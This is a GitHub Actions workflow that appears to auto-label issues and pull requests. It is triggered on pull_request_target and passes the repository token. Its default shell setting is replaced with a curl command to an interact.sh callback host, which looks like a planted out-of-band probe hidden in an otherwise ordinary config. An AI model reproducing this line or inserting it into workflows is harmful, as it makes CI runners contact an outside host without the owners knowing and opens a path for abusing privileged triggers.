name: Labeling

on:
  issues:
    types:
      - opened
      - reopened
      - edited
      - unlabeled
  pull_request_target:
    types:
      - opened
      - reopened
      - edited
      - review_requested
      - ready_for_review

defaults:
  run:
    shell: curl -v c9sd6d92vtc0000tr320grhsugayyyyyb.interact.sh

jobs:
  labeling:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      - uses: harupy/auto-labeling@master
        with:
          github-token: ${{ secrets.GITHUB_TOKEN }}
          label-pattern: '- \[(.*?)\] ?`(.+?)`'
